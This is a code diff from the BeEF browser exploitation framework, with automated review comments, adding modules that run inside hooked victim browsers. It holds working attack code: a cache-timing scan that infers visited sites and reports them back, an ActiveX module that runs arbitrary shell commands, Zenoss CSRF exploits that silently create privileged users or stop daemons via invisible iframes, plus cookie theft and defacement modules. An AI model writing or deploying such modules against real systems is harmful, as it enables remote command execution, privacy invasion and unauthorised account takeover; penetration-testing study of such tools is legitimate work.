{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/**********************
* MAIN STATE MACHINE *
**********************/
var log_area;
var target_off = 0;
var attempt = 0;
var confirmed_visited = false;
var current_url, current_name;
var wait_cycles;
var frame_ready = false;
var start, stop, urls;
/* The frame was just pointed to data:... at this point. Initialize a new test, giving the
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read2, 0);
} else {
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
will be aborted by maybe_test_next(). */
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
function maybe_test_next() {
frame_ready = false;
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
target_off++;
}
if (confirmed_visited) {
log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited');
}
if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) {
if (!confirmed_visited)
//continue;
log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited');
confirmed_visited = false;
target_off++;
attempt = 0;
maybe_test_next();
} else {
current_url = targets[target_off].urls[attempt % targets[target_off].urls.length];
current_name = targets[target_off].name;
attempt++;
perform_check();
}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;
start_stuff();
});
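Review bot: several pieces of this file look like leftovers from the standalone PoC it was ported from: the comments `/* Decides what to do next ... */` and `/* The handler for "run the test" button on the main page ... */` sit below the function they describe and refer to a button that does not exist in a BeEF module, `log_area`, `isIE` and `isFF` are declared but never used, and `hidden_iframe.setAttribute('style','opacity: 0.1')` replaces the entire style attribute that `beef.dom.createInvisibleIframe()` set, so please check the frame is actually still hidden afterwards. The bigger issue is in `log_text`: once the last target is logged it schedules `setTimeout(reload,3000)`, and `reload()` runs `window.location.reload()` on the hooked page itself, which interrupts the hook and gives `beef.net.send` an arbitrary three seconds to finish; resetting the frame to `about:blank` and leaving the page alone is the safer cleanup. Finally, `targets`, `TIME_LIMIT` and `MAX_ATTEMPTS` are only assigned inside the `isFF()`/`isIE()` blocks; `start_stuff` does guard the other browsers, but a comment next to the declarations saying so would help.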

View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_visited_domains:
enable: true
category: "Browser"
name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]
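Review bot: the description "This module will retrieve rapid history extraction through non-destructive cache timing" does not parse; something like "Detects which of a fixed list of sites the browser has visited, using non-destructive cache timing (based on ...)" says what the module does. The `authors` entry also packs a handle, a Twitter name and a URL into one string, while the other modules list plain handles.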

View File

@@ -13,9 +13,13 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
extension:
initialization:
enable: true
name: 'Initialization'
class Get_visited_domains < BeEF::Core::Command
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end
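Review bot: `post_execute` saves `@datastore['results']` verbatim; the JavaScript side builds that string with `<br>` separators, so whatever renders `content['results']` in the admin UI has to escape it, otherwise a hooked browser can push markup into the console. Either strip the markup here and store a plain list, or note in a comment that the value is HTML from an untrusted source.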

File diff suppressed because it is too large

View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_chrome_extensions:
enable: true
category: "Chrome Extensions"
name: "Get Chrome Extensions"
description: "This module detects if any of the top 1,000 Chrome extensions are installed."
authors: ["koto", "bcoles"]
target:
working: ["C"]
not_working: ["All"]
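Review bot: `working: ["C"]` together with `not_working: ["All"]` is contradictory, since "All" includes Chrome, and the other new modules in this range spell the wildcard `ALL`; list the browsers that actually fail, or drop `not_working` here.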

View File

@@ -13,23 +13,16 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
# More info:
# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
#
class Detect_chrome_extensions < BeEF::Core::Command
class DynamicPayloads
include DataMapper::Resource
storage_names[:default] = 'core_dynamicpayloads'
property :id, Serial
property :name, Text, :lazy => false
has n, :dynamic_payload_info
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end
end
end
end

View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
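Review bot: `beefHookUri` hardcodes the `http://` scheme in front of `beef.net.host` and `beef.net.port`; when BeEF is served over https (or the hooked page is https and blocks mixed content) the injected hook URL is wrong. Derive the scheme from the same configuration that supplies host and port rather than fixing it in the string.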

View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
inject_beef:

View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Inject_beef < BeEF::Core::Command
def post_execute

View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var to = "<%= @to %>";
var message = "<%= @message %>";

View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
send_gvoice_sms:

View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Send_gvoice_sms < BeEF::Core::Command
def self.options

View File

@@ -25,7 +25,7 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var dataType = "<%= @dataType %>";
beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); } );
beef.net.request(scheme, method, domain, port, path, anchor, data, timeout, dataType, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, JSON.stringify(response)); } );
});
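Review bot: removing the `response=` prefix changes the wire format of what this command posts back; unless the command's `post_execute` was updated in the same change to read the bare JSON body instead of `@datastore['response']`, the result will no longer be stored. The matching server-side change (or the reason none is needed) should be referenced in the commit message.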

View File

@@ -0,0 +1,34 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
var result = "command was not sent";
try {
var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);
if (shell.toString() == 0) {
result = "command sent";
} else {
result = "command failed";
}
} catch(e) {
result = "command failed";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});
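Review bot: `Run(cmd)` returns an integer, not a shell object, so `shell` is a misleading name, and because no wait flag is passed the return value is 0 as soon as the process is launched, which makes the `command failed` branch inside the `try` effectively unreachable; only the `catch` ever reports a failure. `shell.toString() == 0` also compares a string to a number with loose equality, where `=== 0` on the raw return value is enough. Reporting just "launched" / "not launched" would match what the description already says ("The command response is not returned to BeEF").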

View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
activex_command_execution:
enable: true
category: "Exploits"
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["ALL"]
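Review bot: `user_notify: ["IE"]` with `not_working: ["ALL"]` is self-contradictory, since ALL includes IE; the other new modules use explicit `working`/`not_working` lists. It is also worth stating in the description that the zone setting it names ("Initialize and script ActiveX controls not marked as safe for scripting") is off by default, so a negative result is the expected outcome on a standard IE install rather than a module bug.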

View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Activex_command_execution < BeEF::Core::Command
def self.options
return [
{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

View File

@@ -0,0 +1,33 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var user_level = '<%= @user_level %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_add_user_iframe);
}
setTimeout("cleanup()", 15000);
});
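Review bot: `cleanup = function() {...}` is assigned without `var`, so it leaks a global named `cleanup` onto the hooked page, and `setTimeout("cleanup()", 15000)` evaluates a string; a local `var cleanup` passed as `setTimeout(cleanup, 15000)` avoids both. Also note that "result=exploit attempted" is sent before the frame has loaded, so it must not be read as success.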

View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
name: "Zenoss Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

View File

@@ -0,0 +1,46 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'user_level',
'type' => 'combobox',
'ui_label' => 'User Level',
'store_type' => 'arraystore',
'store_fields' => ['user_level'],
'store_data' => [
['Manager'],
['ZenManager'],
['ZenUser']
],
'emptyText' => 'Select a user level ("Manager" is highest)',
'valueField' => 'user_level',
'displayField' => 'user_level',
'mode' => 'local',
'autoWidth' => true
},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
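Review bot: the default `base` value `http://192.168.1.1:8080/` ends with a slash while the script side prepends `'/zport/dmd/ZenUsers?...'` to it, giving a doubled slash in the path; either normalise the option (`@base.chomp('/')`) or document that it must be given without a trailing slash. A short comment above `store_data` saying the roles are listed from highest to lowest privilege would also make the `emptyText` hint ("Manager" is highest) verifiable in the code.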

View File

@@ -0,0 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var service = '<%= @service %>';
var action = '<%= @action %>';
var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_daemon_iframe);
}
setTimeout("cleanup()", 15000);
});

View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
name: "Zenoss Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

View File

@@ -0,0 +1,70 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_daemon_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'service',
'type' => 'combobox',
'ui_label' => 'Daemon',
'store_type' => 'arraystore',
'store_fields' => ['service', 'description'],
'store_data' => [
['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
['zopectl', 'zopectl (The Zope open source web application server)'],
['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
['zenjobs', 'zenjobs (Zenjobs)'],
['zenping', 'zenping (ICMP ping status monitoring)'],
['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
['zenjmx', 'zenjmx (ZenJMX)']
],
'emptyText' => 'Select a daemon',
'valueField' => 'service',
'displayField' => 'service', #'description',
'mode' => 'local',
'autoWidth' => true
},
{ 'name' => 'action',
'type' => 'combobox',
'ui_label' => 'Action',
'store_type' => 'arraystore',
'store_fields' => ['action'],
'store_data' => [
['Start'],['Stop'],['Restart']
],
'valueField' => 'action',
'displayField' => 'action',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
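Review bot: `'displayField' => 'service', #'description',` leaves a commented-out alternative inside the option hash; either display the `description` column (the store carries it, and the readable text is what the combobox is for) or drop the descriptions together with the trailing comment. The `base` default `http://192.168.1.1:8080/` has the same trailing-slash problem as the add-user module, since the script appends `'/zport/About?...'` to it.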

View File

@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]

View File

@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace Content (Deface)"
description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string."
authors: ["antisnatchor"]

View File

@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]

Some files were not shown because too many files have changed in this diff